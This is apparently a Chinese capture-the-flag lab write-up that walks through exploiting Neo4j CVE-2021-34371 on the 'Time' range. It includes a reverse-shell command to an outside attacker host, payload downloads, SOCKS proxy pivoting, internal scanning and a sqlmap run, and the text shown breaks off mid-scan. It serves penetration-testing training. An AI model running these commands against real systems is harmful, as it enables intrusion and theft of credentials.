春秋云境-Time

この狭いワンルーム
这个狭窄的单人房
心の隙間を広げるようだ
就好像会把内心的缝隙也扩大一样
少し長く感じる
感觉有点漫长呀
ほんの一分一秒
每一分每一秒
君と過ごせたら、と
想着「如果能够和你一起度过的话」

靶机ip:39.98.127.114

难度:中等

涉及内容:外网打点与信息收集:端口扫描(RustScan, Nmap)。

Web漏洞利用:Neo4j Java RMI 反序列化漏洞利用(CVE-2021-34371)。

内网穿透与代理:Stowaway搭建SOCKS5代理、Proxychains配置。

内网Web渗透:自动化SQL注入(SQLMap的UNION联合查询与Time-based时间盲注)。

内网信息收集:Fscan内网网段探测、SharpHound域信息收集。

域内凭据获取:自动登录注册表凭据窃取(Winlogon)。

域安全机制滥用与提权

  • AS-REP Roasting 攻击与哈希破解(John the Ripper)。
  • SID History 属性滥用提权。
  • DCSync 攻击导出域控哈希。
  • Pass-The-Hash (PTH) 哈希传递攻击横向移动。

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 39.98.127.114 --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 39.98.127.114:22
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 00:50 -0500
Initiating Ping Scan at 00:50
Scanning 39.98.127.114 [4 ports]
Completed Ping Scan at 00:50, 0.58s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:50
Completed Parallel DNS resolution of 1 host. at 00:50, 1.50s elapsed
DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating SYN Stealth Scan at 00:50
Scanning 39.98.127.114 [1 port]
Discovered open port 22/tcp on 39.98.127.114
Completed SYN Stealth Scan at 00:50, 0.07s elapsed (1 total ports)
Nmap scan report for 39.98.127.114
Host is up, received reset ttl 128 (0.48s latency).
Scanned at 2026-02-21 00:50:47 EST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 128

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds
           Raw packets sent: 5 (196B) | Rcvd: 256 (10.244KB)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./FScan_2.0.1_linux_x32 -h 39.98.127.114 
┌──────────────────────────────────────────────┐
│    ___                              _        │
/ _ \     ___  ___ _ __ __ _  ___| | __    │
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1
                                                                                                                                                           
[1.2s]     已选择服务扫描模式                                                                                                                              
[1.2s]     开始信息扫描
[1.2s]     最终有效主机数量: 1
[1.2s]     开始主机扫描
[1.2s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle                             
[1.2s]     有效端口数量: 233
[1.2s] [*] 端口开放 39.98.127.114:22
[1.2s] [*] 端口开放 39.98.127.114:7687
[4.2s]     扫描完成, 发现 2 个开放端口
[4.2s]     存活端口数量: 2
[4.2s]     开始漏洞扫描
[4.2s]     POC加载完成: 总共387个,成功387个,失败0
[5.0s] [*] 网站标题 https://39.98.127.114:7687 状态码:400 长度:50     标题:无标题
[1m18s]     扫描已完成: 4/4
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p7687 39.98.127.114 -sC -sV -A -T4
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 00:53 -0500
Nmap scan report for 39.98.127.114
Host is up (0.010s latency).

PORT     STATE SERVICE   VERSION
7687/tcp open  websocket Neo4j Bolt protocol
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37)
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.10 ms 192.168.21.2
2   0.18 ms 39.98.127.114

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.77 seconds

开放7687端口,Google一下发现是neo4j的端口

但是没有找到利用点。

重新用nmap的全端口扫描扫了一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
Nmap scan report for 39.98.127.114
Host is up (0.00031s latency).
Not shown: 65378 filtered tcp ports (no-response), 151 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
1337/tcp  open  waste
7473/tcp  open  rise
7474/tcp  open  neo4j
7687/tcp  open  bolt
36565/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1035.27 seconds

这次扫描出了多了几个。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p22,1337,7473,7474,7687,36565 39.98.127.114 -sC -sV -T4 -A
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 01:14 -0500
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 01:14 (0:00:05 remaining)
Nmap scan report for 39.98.127.114
Host is up (0.0087s latency).

PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 58:b7:39:23:b4:4c:fe:9e:50:62:e3:91:95:fa:fd:33 (RSA)
|   256 44:aa:03:c8:b7:af:9d:96:c5:3d:17:1b:1c:f3:45:c0 (ECDSA)
|_  256 a3:d8:bc:f2:60:54:67:3e:a8:a7:ab:00:47:57:34:2e (ED25519)
1337/tcp  open  java-rmi  Java RMI
| rmi-dumpregistry: 
|   shell
|      implements java.rmi.Remote, org.neo4j.shell.ShellServer, 
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @39.98.127.114:36565
|             extends
|_              java.rmi.server.RemoteObject
7473/tcp  open  ssl/http  Jetty
|_ssl-date: TLS randomness does not represent time
|_http-cors: HEAD GET POST DELETE TRACE OPTIONS PATCH
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2021-06-28T08:56:44
|_Not valid after:  9999-12-31T23:59:59
7474/tcp  open  http      Jetty
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS
7687/tcp  open  websocket Neo4j Bolt protocol
36565/tcp open  java-rmi  Java RMI
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: Actiontec embedded, Linux
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
OS details: Actiontec MI424WR-GEN3I WAP
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.24 ms 192.168.21.2
2   0.26 ms 39.98.127.114

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.52 seconds

1337是neo4j的shell端口,7474是neo4j的webui管理界面

搜索对应漏洞,发现对应exp

zwjjustdoit/CVE-2021-34371.jar: CVE-2021-34371.jar

记得要java8才能运行。

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/home/kali/Desktop/CVE-2021-34371.jar]
└─# ./amazon-corretto-8*/bin/java -jar rhino_gadget.jar rmi://39.98.127.114:1337 "busybox nc 38.55.99.145 9999 -e sh"
Trying to enumerate server bindings: 
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is: 
        java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 
        java.io.IOException
[+] Exploit completed

1
2
3
4
5
6
7
8
9
10
11
12
root@dkhkdZlNGAAKbnRQBVLf:~# penelope -p 9999
[!] Emojis disabled 
[+] Listening for reverse shells on 0.0.0.0:9999127.0.0.138.55.99.145 
➤   Main Menu (m)  Payloads (p)  Clear (Ctrl-L)  Quit (q/Ctrl-C)
[+] Got reverse shell from ubuntu~39.98.127.114-Linux-x86_64  Assigned SessionID <1> 
[+] Attempting to upgrade shell to PTY... 
[+] Shell upgraded successfully using /usr/bin/python3!  
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12  
[+] Logging to /root/.penelope/sessions/ubuntu~39.98.127.114-Linux-x86_64/2026_02_21-14_31_29-174.log  
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 
neo4j@ubuntu:/$ 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
neo4j@ubuntu:/$ ls
bin  boot  dev	etc  home  lib	lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
neo4j@ubuntu:/$ cd /home
neo4j@ubuntu:/home$ ls
neo4j
neo4j@ubuntu:/home$ cd neo4j/
neo4j@ubuntu:~$ ls
flag01.txt
neo4j@ubuntu:~$ cat flag01.txt 
 ██████████ ██                    
░░░░░██░░░ ░░                     
    ░██     ██ ██████████   █████ 
    ░██    ░██░░██░░██░░██ ██░░░██
    ░██    ░██ ░██ ░██ ░██░███████
    ░██    ░██ ░██ ░██ ░██░██░░░░ 
    ░██    ░██ ███ ░██ ░██░░██████
    ░░     ░░ ░░░  ░░  ░░  ░░░░░░ 


flag01: flag{7bf180aa-48de-40bf-8433-2cfb47b5d532}

Do you know the authentication process of Kerberos? 
......This will be the key to your progress.
neo4j@ubuntu:~$

提示kerberos认证流程,先不管,上传fscan和stowaway扫内网搭建代理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
neo4j@ubuntu:~$ busybox wget 38.55.99.145/fscan
Connecting to 38.55.99.145 (38.55.99.145:80)
fscan                100% |*************************************************************************************************************************************************************************************| 8384k  0:00:00 ETA
neo4j@ubuntu:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.6.36  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe38:df53  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:38:df:53  txqueuelen 1000  (Ethernet)
        RX packets 983543  bytes 238186063 (238.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 880401  bytes 67640539 (67.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1606  bytes 149367 (149.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1606  bytes 149367 (149.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


fscan扫网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
neo4j@ubuntu:~$ ./fscan -h 172.22.6.0/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2026-02-21 14:40:59] [INFO] 暴力破解线程数: 1
[2026-02-21 14:40:59] [INFO] 开始信息扫描
[2026-02-21 14:40:59] [INFO] CIDR范围: 172.22.6.0-172.22.6.255
[2026-02-21 14:40:59] [INFO] 生成IP范围: 172.22.6.0.%!d(string=172.22.6.255) - %!s(MISSING).%!d(MISSING)
[2026-02-21 14:40:59] [INFO] 解析CIDR 172.22.6.0/24 -> IP范围 172.22.6.0-172.22.6.255
[2026-02-21 14:40:59] [INFO] 最终有效主机数量: 256
[2026-02-21 14:40:59] [INFO] 开始主机扫描
[2026-02-21 14:40:59] [INFO] 正在尝试无监听ICMP探测...
[2026-02-21 14:40:59] [INFO] 当前用户权限不足,无法发送ICMP包
[2026-02-21 14:40:59] [INFO] 切换为PING方式探测...
[2026-02-21 14:40:59] [SUCCESS] 目标 172.22.6.25     存活 (ICMP)
[2026-02-21 14:40:59] [SUCCESS] 目标 172.22.6.36     存活 (ICMP)
[2026-02-21 14:40:59] [SUCCESS] 目标 172.22.6.38     存活 (ICMP)
[2026-02-21 14:40:59] [SUCCESS] 目标 172.22.6.12     存活 (ICMP)
[2026-02-21 14:41:05] [INFO] 存活主机数量: 4
[2026-02-21 14:41:05] [INFO] 有效端口数量: 233
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.12:88
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.38:80
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.12:445
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.25:445
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.12:389
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.12:139
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.25:139
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.25:135
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.12:135
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.36:7687
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.38:22
[2026-02-21 14:41:05] [SUCCESS] 端口开放 172.22.6.36:22
[2026-02-21 14:41:06] [SUCCESS] 服务识别 172.22.6.38:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2026-02-21 14:41:06] [SUCCESS] 服务识别 172.22.6.36:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.12:88 => 
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.12:445 => 
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.25:445 => 
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.38:80 => [http]
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.12:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2026-02-21 14:41:10] [SUCCESS] 服务识别 172.22.6.12:139 =>  Banner:[.]
[2026-02-21 14:41:11] [SUCCESS] 服务识别 172.22.6.25:139 =>  Banner:[.]
[2026-02-21 14:41:16] [SUCCESS] 服务识别 172.22.6.36:7687 => 
[2026-02-21 14:42:11] [SUCCESS] 服务识别 172.22.6.25:135 => 
[2026-02-21 14:42:11] [SUCCESS] 服务识别 172.22.6.12:135 => 
[2026-02-21 14:42:11] [INFO] 存活端口数量: 12
[2026-02-21 14:42:11] [INFO] 开始漏洞扫描
[2026-02-21 14:42:11] [INFO] 加载的插件: findnet, ldap, ms17010, neo4j, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2026-02-21 14:42:11] [SUCCESS] 网站标题 http://172.22.6.38        状态码:200 长度:1531   标题:后台登录
[2026-02-21 14:42:11] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.6.12
主机名: DC-PROGAME
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.12
[2026-02-21 14:42:11] [SUCCESS] NetBios 172.22.6.25     XIAORANG\WIN2019              
[2026-02-21 14:42:11] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.6.25
主机名: WIN2019
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.25
[2026-02-21 14:42:11] [INFO] 系统信息 172.22.6.12 [Windows Server 2016 Datacenter 14393]
[2026-02-21 14:42:11] [SUCCESS] NetBios 172.22.6.12     DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[2026-02-21 14:42:11] [SUCCESS] 网站标题 https://172.22.6.36:7687  状态码:400 长度:50     标题:无标题
[2026-02-21 14:42:34] [SUCCESS] 扫描已完成: 22/22

IP 地址 开放端口 识别服务/协议 操作系统/版本 主机名 / 域信息 / Web标题
172.22.6.12 88, 135, 139, 389, 445 Kerberos (88) RPC (135) NetBIOS (139) LDAP (389) SMB (445) Windows Server 2016 Datacenter 14393 身份: 域控制器 (DC) 主机名: DC-PROGAME 域名: xiaorang.lab 站点: Default-First-Site-Name
172.22.6.25 135, 139, 445 RPC (135) NetBIOS (139) SMB (445) Windows 主机名: WIN2019 域/工作组: XIAORANG
172.22.6.36 22, 7687 SSH (22) HTTPS / Neo4j (7687) Ubuntu Linux SSH: OpenSSH 8.2p1 Ubuntu Web (7687): 状态码 400,标题: 无标题
172.22.6.38 22, 80 SSH (22) HTTP (80) Ubuntu Linux SSH: OpenSSH 8.2p1 Ubuntu Web (80): 状态码 200,标题: 后台登录 (长度 1531)

搭建代理

1
2
root@dkhkdZlNGAAKbnRQBVLf:/opt# cd stowaway/
root@dkhkdZlNGAAKbnRQBVLf:/opt/stowaway# ./linux_x64_admin -l 7777 -s 123456
1
2
3
root@dkhkdZlNGAAKbnRQBVLf:/opt/stowaway# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
39.98.127.114 - - [21/Feb/2026 14:51:19] "GET /linux_x64_agent HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
neo4j@ubuntu:~$ busybox wget 38.55.99.145/linux_x64_agent -O agent
Connecting to 38.55.99.145 (38.55.99.145:80)
agent                 17% |*******************************                                                                                                                                                      |  380k  - stalled -
agent                100% |*************************************************************************************************************************************************************************************| 2174k  0:00:00 ETA
neo4j@ubuntu:~$ 
neo4j@ubuntu:~$ 
neo4j@ubuntu:~$ chmod +x agent 
neo4j@ubuntu:~$ ./agent -c 38.55.99.145:7777 -s 123456 &
[1] 3876
neo4j@ubuntu:~$ 2026/02/21 14:54:18 [*] Starting agent node actively.Connecting to 38.55.99.145:7777
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
[*] Starting admin node on port 7777

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.98.127.114:55474 is set up successfully! Node id is 0
(admin) >> use 0
[*] Unknown Command!

	help                                     		Show help information
	detail                                  		Display connected nodes' detail
	topo                                     		Display nodes' topology
	use        <id>                          		Select the target node you want to use
	exit                                     		Exit Stowaway
  
(admin) >> use 0
(node 0) >> socks 8888
[*] Trying to listen on 0.0.0.0:8888......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>

本地的proxychains4也已经配置好了,现在curl一下内网。

1
2
#socks5 127.0.0.1 1080
socks5 38.55.99.145 8888
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 curl 172.22.6.38:80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>后台登录</title>

<link rel="stylesheet" type="text/css" href="css/style.css">

<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/vector.js"></script>

</head>
<body>

<div id="container">
        <div id="output">
                <div class="containerT">
                        <h1>后台登录</h1>
                        <form class="form" id="entry_form" action="index.php" method="POST">
                                <input type="text" placeholder="用户名" id="entry_name" name="username" value="admin">
                                <input type="password" placeholder="密码" id="entry_password" name="password">
                                <!--<button type="button" id="entry_btn">登录</button>-->
                                <input type="submit" class="button" value="提交">
                                <div id="prompt" class="prompt"></div>
                        </form>
                </div>
        </div>
</div>

<script type="text/javascript">
    $(function(){
        Victor("container", "output");   //登录背景函数
        $("#entry_name").focus();
        $(document).keydown(function(event){
            if(event.keyCode==13){
                $("#entry_btn").click();
            }
        });
    });
</script>
<style>
.copyrights{text-indent:-9999px;height:0;line-height:0;font-size:0;overflow:hidden;}
</style>



<script>alert('Please enter username and password.')</script>

需要输入用户名和密码,bp先设置上游代理。

抓一个登录包看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat 1.req                       
POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://172.22.6.38
Connection: keep-alive
Referer: http://172.22.6.38/
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=123

试一下sqlmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 sqlmap -r 1.req --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                                               
 ___ ___[,]_____ ___ ___  {1.10#stable}                                                                                                                    
|_ -| . [.]     | .'| . |                                                                                                                                  
|___|_  [,]_|_|_|__,|  _|                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:09:30 /2026-02-21/

[02:09:30] [INFO] parsing HTTP request from '1.req'
[02:09:30] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.145:8888 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:31] [INFO] testing if the target URL content is stable
[02:09:31] [INFO] target URL content is stable8888  ...  172.22.6.38:80 
[02:09:31] [INFO] testing if POST parameter 'username' is dynamic
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:31] [WARNING] POST parameter 'username' does not appear to be dynamic
[02:09:31] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:33] [INFO] testing for SQL injection on POST parameter 'username'
[02:09:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80 [proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
[02:09:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.38:80  ...  OK
 ...  OK
